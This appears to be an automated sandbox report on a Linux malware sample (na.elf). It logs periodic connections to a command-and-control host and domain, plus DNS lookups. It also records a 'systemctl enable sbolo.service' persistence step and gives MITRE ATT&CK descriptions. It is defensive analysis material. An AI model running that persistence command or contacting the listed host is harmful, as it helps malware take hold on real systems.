Oct 7, 2024 16:29:09.455312014 CEST	23561	41658	91.200.103.117	192.168.2.15
Oct 7, 2024 16:29:09.455377102 CEST	41658	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:29:09.456096888 CEST	41658	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:29:09.461266994 CEST	23561	41658	91.200.103.117	192.168.2.15
Oct 7, 2024 16:29:11.127007961 CEST	23561	41658	91.200.103.117	192.168.2.15
Oct 7, 2024 16:29:11.127193928 CEST	41658	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:29:11.132057905 CEST	23561	41658	91.200.103.117	192.168.2.15
Oct 7, 2024 16:29:21.258997917 CEST	41660	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:29:21.264128923 CEST	23561	41660	91.200.103.117	192.168.2.15
Oct 7, 2024 16:29:21.264195919 CEST	41660	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:29:21.265137911 CEST	41660	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:29:21.271286011 CEST	23561	41660	91.200.103.117	192.168.2.15
Oct 7, 2024 16:29:22.869743109 CEST	23561	41660	91.200.103.117	192.168.2.15
Oct 7, 2024 16:29:22.869954109 CEST	41660	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:29:22.874721050 CEST	23561	41660	91.200.103.117	192.168.2.15
Oct 7, 2024 16:29:28.878982067 CEST	41662	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:29:28.883790970 CEST	23561	41662	91.200.103.117	192.168.2.15
Oct 7, 2024 16:29:28.883860111 CEST	41662	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:29:28.886641026 CEST	41662	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:29:28.891649961 CEST	23561	41662	91.200.103.117	192.168.2.15
Oct 7, 2024 16:29:30.547544003 CEST	23561	41662	91.200.103.117	192.168.2.15
Oct 7, 2024 16:29:30.547724009 CEST	41662	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:29:30.553085089 CEST	23561	41662	91.200.103.117	192.168.2.15
Oct 7, 2024 16:29:40.557430983 CEST	41664	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:29:40.562309027 CEST	23561	41664	91.200.103.117	192.168.2.15
Oct 7, 2024 16:29:40.562374115 CEST	41664	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:29:40.562967062 CEST	41664	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:29:40.567780972 CEST	23561	41664	91.200.103.117	192.168.2.15
Oct 7, 2024 16:29:42.184689999 CEST	23561	41664	91.200.103.117	192.168.2.15
Oct 7, 2024 16:29:42.184830904 CEST	41664	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:29:42.190272093 CEST	23561	41664	91.200.103.117	192.168.2.15
Oct 7, 2024 16:29:42.626739979 CEST	55810	53	192.168.2.15	8.8.8.8
Oct 7, 2024 16:29:42.631664038 CEST	53	55810	8.8.8.8	192.168.2.15
Oct 7, 2024 16:29:42.631728888 CEST	55810	53	192.168.2.15	8.8.8.8
Oct 7, 2024 16:29:42.631743908 CEST	55810	53	192.168.2.15	8.8.8.8
Oct 7, 2024 16:29:42.631763935 CEST	55810	53	192.168.2.15	8.8.8.8
Oct 7, 2024 16:29:42.636717081 CEST	53	55810	8.8.8.8	192.168.2.15
Oct 7, 2024 16:29:42.637048960 CEST	53	55810	8.8.8.8	192.168.2.15
Oct 7, 2024 16:29:43.057563066 CEST	53	55810	8.8.8.8	192.168.2.15
Oct 7, 2024 16:29:43.061269999 CEST	55810	53	192.168.2.15	8.8.8.8
Oct 7, 2024 16:29:43.182174921 CEST	53	55810	8.8.8.8	192.168.2.15
Oct 7, 2024 16:29:43.182720900 CEST	55810	53	192.168.2.15	8.8.8.8
Oct 7, 2024 16:29:45.058268070 CEST	53	55810	8.8.8.8	192.168.2.15
Oct 7, 2024 16:29:45.063107014 CEST	55810	53	192.168.2.15	8.8.8.8
Oct 7, 2024 16:29:45.068104982 CEST	53	55810	8.8.8.8	192.168.2.15
Oct 7, 2024 16:29:45.454617023 CEST	41668	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:29:45.459537983 CEST	23561	41668	91.200.103.117	192.168.2.15
Oct 7, 2024 16:29:45.462616920 CEST	41668	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:29:45.542576075 CEST	41668	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:29:45.547398090 CEST	23561	41668	91.200.103.117	192.168.2.15
Oct 7, 2024 16:29:47.079379082 CEST	23561	41668	91.200.103.117	192.168.2.15
Oct 7, 2024 16:29:47.079631090 CEST	41668	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:29:47.084480047 CEST	23561	41668	91.200.103.117	192.168.2.15
Oct 7, 2024 16:29:52.095820904 CEST	41670	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:29:52.100642920 CEST	23561	41670	91.200.103.117	192.168.2.15
Oct 7, 2024 16:29:52.100991964 CEST	41670	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:29:52.101309061 CEST	41670	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:29:52.106122017 CEST	23561	41670	91.200.103.117	192.168.2.15
Oct 7, 2024 16:29:53.699300051 CEST	23561	41670	91.200.103.117	192.168.2.15
Oct 7, 2024 16:29:53.699445963 CEST	41670	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:29:53.704356909 CEST	23561	41670	91.200.103.117	192.168.2.15
Oct 7, 2024 16:29:56.709172010 CEST	41672	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:29:56.714447975 CEST	23561	41672	91.200.103.117	192.168.2.15
Oct 7, 2024 16:29:56.714526892 CEST	41672	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:29:56.715478897 CEST	41672	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:29:56.720545053 CEST	23561	41672	91.200.103.117	192.168.2.15
Oct 7, 2024 16:29:58.343408108 CEST	23561	41672	91.200.103.117	192.168.2.15
Oct 7, 2024 16:29:58.343555927 CEST	41672	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:29:58.348421097 CEST	23561	41672	91.200.103.117	192.168.2.15
Oct 7, 2024 16:30:08.353007078 CEST	41674	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:30:08.357933998 CEST	23561	41674	91.200.103.117	192.168.2.15
Oct 7, 2024 16:30:08.357989073 CEST	41674	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:30:08.358601093 CEST	41674	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:30:08.363428116 CEST	23561	41674	91.200.103.117	192.168.2.15
Oct 7, 2024 16:30:09.986047029 CEST	23561	41674	91.200.103.117	192.168.2.15
Oct 7, 2024 16:30:09.986180067 CEST	41674	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:30:09.991636992 CEST	23561	41674	91.200.103.117	192.168.2.15
Oct 7, 2024 16:30:11.995325089 CEST	41676	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:30:12.000299931 CEST	23561	41676	91.200.103.117	192.168.2.15
Oct 7, 2024 16:30:12.000396967 CEST	41676	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:30:12.001095057 CEST	41676	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:30:12.005877972 CEST	23561	41676	91.200.103.117	192.168.2.15
Oct 7, 2024 16:30:13.669790030 CEST	23561	41676	91.200.103.117	192.168.2.15
Oct 7, 2024 16:30:13.670011997 CEST	41676	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:30:13.674913883 CEST	23561	41676	91.200.103.117	192.168.2.15
Oct 7, 2024 16:30:21.689384937 CEST	41678	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:30:21.694715023 CEST	23561	41678	91.200.103.117	192.168.2.15
Oct 7, 2024 16:30:21.694778919 CEST	41678	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:30:21.695400953 CEST	41678	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:30:21.700181007 CEST	23561	41678	91.200.103.117	192.168.2.15
Oct 7, 2024 16:30:23.297605038 CEST	23561	41678	91.200.103.117	192.168.2.15
Oct 7, 2024 16:30:23.297749996 CEST	41678	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:30:23.302687883 CEST	23561	41678	91.200.103.117	192.168.2.15
Oct 7, 2024 16:30:28.307990074 CEST	41680	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:30:28.312947989 CEST	23561	41680	91.200.103.117	192.168.2.15
Oct 7, 2024 16:30:28.313184023 CEST	41680	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:30:28.314261913 CEST	41680	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:30:28.319015026 CEST	23561	41680	91.200.103.117	192.168.2.15
Oct 7, 2024 16:30:29.964735985 CEST	23561	41680	91.200.103.117	192.168.2.15
Oct 7, 2024 16:30:29.964880943 CEST	41680	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:30:29.969882011 CEST	23561	41680	91.200.103.117	192.168.2.15

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 7, 2024 16:26:59.013564110 CEST	56471	53	192.168.2.15	8.8.8.8
Oct 7, 2024 16:26:59.675637960 CEST	53	56471	8.8.8.8	192.168.2.15
Oct 7, 2024 16:27:04.329395056 CEST	60592	53	192.168.2.15	8.8.8.8
Oct 7, 2024 16:27:04.337105036 CEST	53	60592	8.8.8.8	192.168.2.15
Oct 7, 2024 16:27:09.013325930 CEST	42823	53	192.168.2.15	8.8.8.8
Oct 7, 2024 16:27:09.020570040 CEST	53	42823	8.8.8.8	192.168.2.15
Oct 7, 2024 16:27:20.634593010 CEST	51876	53	192.168.2.15	8.8.8.8
Oct 7, 2024 16:27:20.641527891 CEST	53	51876	8.8.8.8	192.168.2.15
Oct 7, 2024 16:27:24.313563108 CEST	39703	53	192.168.2.15	8.8.8.8
Oct 7, 2024 16:27:24.329118967 CEST	53	39703	8.8.8.8	192.168.2.15
Oct 7, 2024 16:27:33.951715946 CEST	59565	53	192.168.2.15	8.8.8.8
Oct 7, 2024 16:27:33.958358049 CEST	53	59565	8.8.8.8	192.168.2.15
Oct 7, 2024 16:27:37.591448069 CEST	34815	53	192.168.2.15	8.8.8.8
Oct 7, 2024 16:27:37.598891973 CEST	53	34815	8.8.8.8	192.168.2.15
Oct 7, 2024 16:27:46.492557049 CEST	41049	53	192.168.2.15	8.8.8.8
Oct 7, 2024 16:27:46.499962091 CEST	53	41049	8.8.8.8	192.168.2.15
Oct 7, 2024 16:27:54.130675077 CEST	55519	53	192.168.2.15	8.8.8.8
Oct 7, 2024 16:27:54.138160944 CEST	53	55519	8.8.8.8	192.168.2.15
Oct 7, 2024 16:27:56.751756907 CEST	58566	53	192.168.2.15	8.8.8.8
Oct 7, 2024 16:27:56.758908033 CEST	53	58566	8.8.8.8	192.168.2.15
Oct 7, 2024 16:28:04.374725103 CEST	36512	53	192.168.2.15	8.8.8.8
Oct 7, 2024 16:28:04.381858110 CEST	53	36512	8.8.8.8	192.168.2.15
Oct 7, 2024 16:28:07.016633987 CEST	35506	53	192.168.2.15	8.8.8.8
Oct 7, 2024 16:28:07.023446083 CEST	53	35506	8.8.8.8	192.168.2.15
Oct 7, 2024 16:28:10.658463001 CEST	36209	53	192.168.2.15	8.8.8.8
Oct 7, 2024 16:28:10.812582970 CEST	53	36209	8.8.8.8	192.168.2.15
Oct 7, 2024 16:28:13.475169897 CEST	45442	53	192.168.2.15	8.8.8.8
Oct 7, 2024 16:28:13.482220888 CEST	53	45442	8.8.8.8	192.168.2.15
Oct 7, 2024 16:28:24.092350960 CEST	53471	53	192.168.2.15	8.8.8.8
Oct 7, 2024 16:28:24.107633114 CEST	53	53471	8.8.8.8	192.168.2.15
Oct 7, 2024 16:28:34.788705111 CEST	38535	53	192.168.2.15	8.8.8.8
Oct 7, 2024 16:28:34.797617912 CEST	53	38535	8.8.8.8	192.168.2.15
Oct 7, 2024 16:28:43.810432911 CEST	47219	53	192.168.2.15	8.8.8.8
Oct 7, 2024 16:28:43.818039894 CEST	53	47219	8.8.8.8	192.168.2.15
Oct 7, 2024 16:28:51.830888033 CEST	51766	53	192.168.2.15	8.8.8.8
Oct 7, 2024 16:28:51.838112116 CEST	53	51766	8.8.8.8	192.168.2.15
Oct 7, 2024 16:28:57.489679098 CEST	56787	53	192.168.2.15	8.8.8.8
Oct 7, 2024 16:28:57.499748945 CEST	53	56787	8.8.8.8	192.168.2.15
Oct 7, 2024 16:29:00.106976986 CEST	54215	53	192.168.2.15	8.8.8.8
Oct 7, 2024 16:29:00.117515087 CEST	53	54215	8.8.8.8	192.168.2.15
Oct 7, 2024 16:29:03.801065922 CEST	51266	53	192.168.2.15	8.8.8.8
Oct 7, 2024 16:29:03.812025070 CEST	53	51266	8.8.8.8	192.168.2.15
Oct 7, 2024 16:29:09.441320896 CEST	44805	53	192.168.2.15	8.8.8.8
Oct 7, 2024 16:29:09.449019909 CEST	53	44805	8.8.8.8	192.168.2.15
Oct 7, 2024 16:29:21.128983974 CEST	57960	53	192.168.2.15	8.8.8.8
Oct 7, 2024 16:29:21.258193970 CEST	53	57960	8.8.8.8	192.168.2.15
Oct 7, 2024 16:29:28.871577978 CEST	44716	53	192.168.2.15	8.8.8.8
Oct 7, 2024 16:29:28.878607988 CEST	53	44716	8.8.8.8	192.168.2.15
Oct 7, 2024 16:29:40.549242973 CEST	38083	53	192.168.2.15	8.8.8.8
Oct 7, 2024 16:29:40.556942940 CEST	53	38083	8.8.8.8	192.168.2.15
Oct 7, 2024 16:29:45.254586935 CEST	52415	53	192.168.2.15	8.8.8.8
Oct 7, 2024 16:29:45.440766096 CEST	53	52415	8.8.8.8	192.168.2.15
Oct 7, 2024 16:29:52.087658882 CEST	60081	53	192.168.2.15	8.8.8.8
Oct 7, 2024 16:29:52.095310926 CEST	53	60081	8.8.8.8	192.168.2.15
Oct 7, 2024 16:29:56.701343060 CEST	44149	53	192.168.2.15	8.8.8.8
Oct 7, 2024 16:29:56.708765030 CEST	53	44149	8.8.8.8	192.168.2.15
Oct 7, 2024 16:30:08.345376968 CEST	59783	53	192.168.2.15	8.8.8.8
Oct 7, 2024 16:30:08.352577925 CEST	53	59783	8.8.8.8	192.168.2.15
Oct 7, 2024 16:30:11.988225937 CEST	51518	53	192.168.2.15	8.8.8.8
Oct 7, 2024 16:30:11.994965076 CEST	53	51518	8.8.8.8	192.168.2.15
Oct 7, 2024 16:30:21.671679974 CEST	33398	53	192.168.2.15	8.8.8.8
Oct 7, 2024 16:30:21.688847065 CEST	53	33398	8.8.8.8	192.168.2.15
Oct 7, 2024 16:30:28.300410986 CEST	35788	53	192.168.2.15	8.8.8.8
Oct 7, 2024 16:30:28.307272911 CEST	53	35788	8.8.8.8	192.168.2.15

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 7, 2024 16:26:59.013564110 CEST	192.168.2.15	8.8.8.8	0x42cc	Standard query (0)	yi0key.heleh.com.vn	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:27:04.329395056 CEST	192.168.2.15	8.8.8.8	0x78d3	Standard query (0)	yi0key.heleh.com.vn	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:27:09.013325930 CEST	192.168.2.15	8.8.8.8	0x4ea2	Standard query (0)	yi0key.heleh.com.vn	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:27:20.634593010 CEST	192.168.2.15	8.8.8.8	0xe9df	Standard query (0)	yi0key.heleh.com.vn	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:27:24.313563108 CEST	192.168.2.15	8.8.8.8	0xbf1b	Standard query (0)	yi0key.heleh.com.vn	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:27:33.951715946 CEST	192.168.2.15	8.8.8.8	0x1949	Standard query (0)	yi0key.heleh.com.vn	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:27:37.591448069 CEST	192.168.2.15	8.8.8.8	0x882b	Standard query (0)	yi0key.heleh.com.vn	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:27:46.492557049 CEST	192.168.2.15	8.8.8.8	0x9ad8	Standard query (0)	yi0key.heleh.com.vn	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:27:54.130675077 CEST	192.168.2.15	8.8.8.8	0xf1c5	Standard query (0)	yi0key.heleh.com.vn	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:27:56.751756907 CEST	192.168.2.15	8.8.8.8	0x534c	Standard query (0)	yi0key.heleh.com.vn	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:28:04.374725103 CEST	192.168.2.15	8.8.8.8	0xf3a8	Standard query (0)	yi0key.heleh.com.vn	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:28:07.016633987 CEST	192.168.2.15	8.8.8.8	0xc5a3	Standard query (0)	yi0key.heleh.com.vn	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:28:10.658463001 CEST	192.168.2.15	8.8.8.8	0x61de	Standard query (0)	yi0key.heleh.com.vn	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:28:13.475169897 CEST	192.168.2.15	8.8.8.8	0x7d3c	Standard query (0)	yi0key.heleh.com.vn	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:28:24.092350960 CEST	192.168.2.15	8.8.8.8	0xf31f	Standard query (0)	yi0key.heleh.com.vn	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:28:34.788705111 CEST	192.168.2.15	8.8.8.8	0x1164	Standard query (0)	yi0key.heleh.com.vn	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:28:43.810432911 CEST	192.168.2.15	8.8.8.8	0xa8af	Standard query (0)	yi0key.heleh.com.vn	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:28:51.830888033 CEST	192.168.2.15	8.8.8.8	0xf868	Standard query (0)	yi0key.heleh.com.vn	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:28:57.489679098 CEST	192.168.2.15	8.8.8.8	0x865f	Standard query (0)	yi0key.heleh.com.vn	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:29:00.106976986 CEST	192.168.2.15	8.8.8.8	0x9292	Standard query (0)	yi0key.heleh.com.vn	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:29:03.801065922 CEST	192.168.2.15	8.8.8.8	0xcf5e	Standard query (0)	yi0key.heleh.com.vn	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:29:09.441320896 CEST	192.168.2.15	8.8.8.8	0xaf92	Standard query (0)	yi0key.heleh.com.vn	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:29:21.128983974 CEST	192.168.2.15	8.8.8.8	0x539b	Standard query (0)	yi0key.heleh.com.vn	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:29:28.871577978 CEST	192.168.2.15	8.8.8.8	0xbf97	Standard query (0)	yi0key.heleh.com.vn	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:29:40.549242973 CEST	192.168.2.15	8.8.8.8	0xf9c0	Standard query (0)	yi0key.heleh.com.vn	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:29:42.631743908 CEST	192.168.2.15	8.8.8.8	0x23df	Standard query (0)	daisy.ubuntu.com	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:29:42.631763935 CEST	192.168.2.15	8.8.8.8	0x6a30	Standard query (0)	daisy.ubuntu.com	28	IN (0x0001)	false
Oct 7, 2024 16:29:45.254586935 CEST	192.168.2.15	8.8.8.8	0xd836	Standard query (0)	yi0key.heleh.com.vn	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:29:52.087658882 CEST	192.168.2.15	8.8.8.8	0x497a	Standard query (0)	yi0key.heleh.com.vn	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:29:56.701343060 CEST	192.168.2.15	8.8.8.8	0x12da	Standard query (0)	yi0key.heleh.com.vn	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:30:08.345376968 CEST	192.168.2.15	8.8.8.8	0x1e6e	Standard query (0)	yi0key.heleh.com.vn	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:30:11.988225937 CEST	192.168.2.15	8.8.8.8	0x6ef0	Standard query (0)	yi0key.heleh.com.vn	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:30:21.671679974 CEST	192.168.2.15	8.8.8.8	0x8f66	Standard query (0)	yi0key.heleh.com.vn	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:30:28.300410986 CEST	192.168.2.15	8.8.8.8	0xc641	Standard query (0)	yi0key.heleh.com.vn	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Oct 7, 2024 16:26:59.675637960 CEST	8.8.8.8	192.168.2.15	0x42cc	No error (0)	yi0key.heleh.com.vn	91.200.103.117	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:27:04.337105036 CEST	8.8.8.8	192.168.2.15	0x78d3	No error (0)	yi0key.heleh.com.vn	91.200.103.117	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:27:09.020570040 CEST	8.8.8.8	192.168.2.15	0x4ea2	No error (0)	yi0key.heleh.com.vn	91.200.103.117	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:27:20.641527891 CEST	8.8.8.8	192.168.2.15	0xe9df	No error (0)	yi0key.heleh.com.vn	91.200.103.117	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:27:24.329118967 CEST	8.8.8.8	192.168.2.15	0xbf1b	No error (0)	yi0key.heleh.com.vn	91.200.103.117	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:27:33.958358049 CEST	8.8.8.8	192.168.2.15	0x1949	No error (0)	yi0key.heleh.com.vn	91.200.103.117	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:27:37.598891973 CEST	8.8.8.8	192.168.2.15	0x882b	No error (0)	yi0key.heleh.com.vn	91.200.103.117	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:27:46.499962091 CEST	8.8.8.8	192.168.2.15	0x9ad8	No error (0)	yi0key.heleh.com.vn	91.200.103.117	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:27:54.138160944 CEST	8.8.8.8	192.168.2.15	0xf1c5	No error (0)	yi0key.heleh.com.vn	91.200.103.117	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:27:56.758908033 CEST	8.8.8.8	192.168.2.15	0x534c	No error (0)	yi0key.heleh.com.vn	91.200.103.117	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:28:04.381858110 CEST	8.8.8.8	192.168.2.15	0xf3a8	No error (0)	yi0key.heleh.com.vn	91.200.103.117	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:28:07.023446083 CEST	8.8.8.8	192.168.2.15	0xc5a3	No error (0)	yi0key.heleh.com.vn	91.200.103.117	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:28:10.812582970 CEST	8.8.8.8	192.168.2.15	0x61de	No error (0)	yi0key.heleh.com.vn	91.200.103.117	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:28:13.482220888 CEST	8.8.8.8	192.168.2.15	0x7d3c	No error (0)	yi0key.heleh.com.vn	91.200.103.117	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:28:24.107633114 CEST	8.8.8.8	192.168.2.15	0xf31f	No error (0)	yi0key.heleh.com.vn	91.200.103.117	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:28:34.797617912 CEST	8.8.8.8	192.168.2.15	0x1164	No error (0)	yi0key.heleh.com.vn	91.200.103.117	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:28:43.818039894 CEST	8.8.8.8	192.168.2.15	0xa8af	No error (0)	yi0key.heleh.com.vn	91.200.103.117	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:28:51.838112116 CEST	8.8.8.8	192.168.2.15	0xf868	No error (0)	yi0key.heleh.com.vn	91.200.103.117	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:28:57.499748945 CEST	8.8.8.8	192.168.2.15	0x865f	No error (0)	yi0key.heleh.com.vn	91.200.103.117	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:29:00.117515087 CEST	8.8.8.8	192.168.2.15	0x9292	No error (0)	yi0key.heleh.com.vn	91.200.103.117	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:29:03.812025070 CEST	8.8.8.8	192.168.2.15	0xcf5e	No error (0)	yi0key.heleh.com.vn	91.200.103.117	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:29:09.449019909 CEST	8.8.8.8	192.168.2.15	0xaf92	No error (0)	yi0key.heleh.com.vn	91.200.103.117	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:29:21.258193970 CEST	8.8.8.8	192.168.2.15	0x539b	No error (0)	yi0key.heleh.com.vn	91.200.103.117	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:29:28.878607988 CEST	8.8.8.8	192.168.2.15	0xbf97	No error (0)	yi0key.heleh.com.vn	91.200.103.117	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:29:40.556942940 CEST	8.8.8.8	192.168.2.15	0xf9c0	No error (0)	yi0key.heleh.com.vn	91.200.103.117	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:29:43.182174921 CEST	8.8.8.8	192.168.2.15	0x23df	No error (0)	daisy.ubuntu.com	162.213.35.25	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:29:43.182174921 CEST	8.8.8.8	192.168.2.15	0x23df	No error (0)	daisy.ubuntu.com	162.213.35.24	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:29:45.440766096 CEST	8.8.8.8	192.168.2.15	0xd836	No error (0)	yi0key.heleh.com.vn	91.200.103.117	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:29:52.095310926 CEST	8.8.8.8	192.168.2.15	0x497a	No error (0)	yi0key.heleh.com.vn	91.200.103.117	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:29:56.708765030 CEST	8.8.8.8	192.168.2.15	0x12da	No error (0)	yi0key.heleh.com.vn	91.200.103.117	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:30:08.352577925 CEST	8.8.8.8	192.168.2.15	0x1e6e	No error (0)	yi0key.heleh.com.vn	91.200.103.117	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:30:11.994965076 CEST	8.8.8.8	192.168.2.15	0x6ef0	No error (0)	yi0key.heleh.com.vn	91.200.103.117	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:30:21.688847065 CEST	8.8.8.8	192.168.2.15	0x8f66	No error (0)	yi0key.heleh.com.vn	91.200.103.117	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:30:28.307272911 CEST	8.8.8.8	192.168.2.15	0xc641	No error (0)	yi0key.heleh.com.vn	91.200.103.117	A (IP address)	IN (0x0001)	false

System Behavior

Analysis Process: na.elf PID: 5691, Parent PID: 5617

General

Start time (UTC):	14:26:57
Start date (UTC):	07/10/2024
Path:	/tmp/na.elf
Arguments:	/tmp/na.elf
File size:	4956856 bytes
MD5 hash:	5ebfcae4fe2471fcc5695c2394773ff1

Start time (UTC):	14:26:57
Start date (UTC):	07/10/2024
Path:	/tmp/na.elf
Arguments:	-
File size:	4956856 bytes
MD5 hash:	5ebfcae4fe2471fcc5695c2394773ff1

Start time (UTC):	14:26:57
Start date (UTC):	07/10/2024
Path:	/tmp/na.elf
Arguments:	-
File size:	4956856 bytes
MD5 hash:	5ebfcae4fe2471fcc5695c2394773ff1

Start time (UTC):	14:26:57
Start date (UTC):	07/10/2024
Path:	/bin/sh
Arguments:	sh -c "systemctl enable sbolo.service > /dev/null 2>&1"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	14:26:57
Start date (UTC):	07/10/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	14:26:57
Start date (UTC):	07/10/2024
Path:	/usr/bin/systemctl
Arguments:	systemctl enable sbolo.service
File size:	996584 bytes
MD5 hash:	4deddfb6741481f68aeac522cc26ff4b

Start time (UTC):	14:26:57
Start date (UTC):	07/10/2024
Path:	/tmp/na.elf
Arguments:	-
File size:	4956856 bytes
MD5 hash:	5ebfcae4fe2471fcc5695c2394773ff1

Start time (UTC):	14:26:57
Start date (UTC):	07/10/2024
Path:	/usr/lib/systemd/systemd
Arguments:	-
File size:	1620224 bytes
MD5 hash:	9b2bec7092a40488108543f9334aab75

Start time (UTC):	14:26:57
Start date (UTC):	07/10/2024
Path:	/usr/lib/systemd/system-environment-generators/snapd-env-generator
Arguments:	/usr/lib/systemd/system-environment-generators/snapd-env-generator
File size:	22760 bytes
MD5 hash:	3633b075f40283ec938a2a6a89671b0e

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify systemd services to repeatedly execute malicious payloads as part of persistence. Systemd is a system and service manager commonly used for managing background daemon processes (also known as services) and other system resources.Systemd is the default initialization (init) system on many Linux distributions replacing legacy init systems, including SysVinit and Upstart, while remaining backwards compatible.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Creation, File: File Modification, Process: Process Creation, Service: Service Creation, Service: Service Modification
Platforms:	Linux
